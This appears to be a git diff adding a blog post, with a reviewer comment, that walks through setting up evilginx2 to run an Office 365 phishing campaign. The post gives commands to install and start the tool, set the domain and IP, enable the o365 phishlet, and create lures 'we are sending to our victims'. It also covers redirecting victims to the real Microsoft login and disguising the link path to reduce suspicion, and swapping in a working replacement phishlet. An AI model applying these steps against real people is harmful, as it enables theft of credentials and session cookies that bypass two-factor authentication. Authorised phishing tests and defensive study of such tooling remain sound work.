content/blog/Gone-phishing

```diff
@@ -0,0 +1,149 @@
+![ ](Arecords.png)
+
+### Evilgophish setup
+
+The tools we use for our phishing campaigns are evilginx2 and gophish.
+Evilginx2 is a man-in-the-middle attack framework used for phishing login credentials along with session cookies, which in turn allows to bypass 2-factor authentication protection.
+To install evilginx2 go to https://github.com/kgretzky/evilginx2/releases and copy the link behind the precompiled package e.g (evilginx-linux-amd64.tar.gz)
+![ ](copylinkevilginx2.png)
+Go to your VPS trough ssh and past the link behind the **wget** command : 
+```wget https://github.com/kgretzky/evilginx2/releases/download/<newst.version>/evilginx-linux-amd64.tar.gz```
+
+Now extract the file accordantly, for tar.gz files you should:
+```tar -xf <filename>```
+to start the engine:
+```chmod 700 ./evilginx2```
+```sudo ./evilginx2```
+![ ](evilginx%20start.png)
+If something goes wrong please check [here](https://github.com/kgretzky/evilginx2) for further instructions.
+For the demo we will concentrate on Office 365.
+now we need to edit the config file to add our domain,IP and redirect url.
+The redirect url will redirect will mislead unintended users.
+```config domain <yourdomain>```
+```config ip <yourip>```
+```config redirect_url https://www.youtube.com/watch?v=dQw4w9WgXcQ```
+To check just type ```config```
+![ ](configcheck.png)
+Now we need to set up TLS certification for our domain. all the work here will be done by the tool, we only need to configure our domain for the "phishlet" we want to use:
+```phishlets hostname o365 <yourdomain>```
+```phishlets enable o365```
+
+![ ](phisletsenable.png)
+If for some reason the tool does not give you: successfully set up SSL/TLS certificates for domains then double check your DNS configuration at your control panel of your domain host.
+
+Next we need to set up the lure, the actual phishing link we are sending to our victims
+```lures create o365```
+```lures get-url 1```
+![ ](lurescreate.png)
+Now we need add the redirect url to the page they will see after logging in. In this case we will use the official log in page of office to lower the suspicion of the phished user. also we can change the URL path of the phishing link to reduce suspicion if the user inspects the link.
+```lures edit 0 redirect_url https://login.microsoftonline.com```
+```lures edit 0 path securelink```
+![ ](redirectlures.png)
+At the time of writing this the standard phishlet for office365 did not work, if you want to update the o365 phishlet here are the steps.
+
+Go to the directory where evilginx2 is located.
+```~/evilginx2 ls```
+``` cd phishlets```
+``` vim o365.yaml ```
+now you should be in the yaml file that holds the phishlet data.
+To delete the content easly hold ```shift + :``` to be able to type then type ```%d``` and press enter. normally the file should be empty now.
+Now go to this [link](https://gist.github.com/hazcod/887dc2bbc3eb90ac9fd7788867b23416) and copy the code.
```

Comment:
`This link` -> I've uploaded a working Office365 phishlet for use in evilnginx2. 
Try explaining what the phishlets are.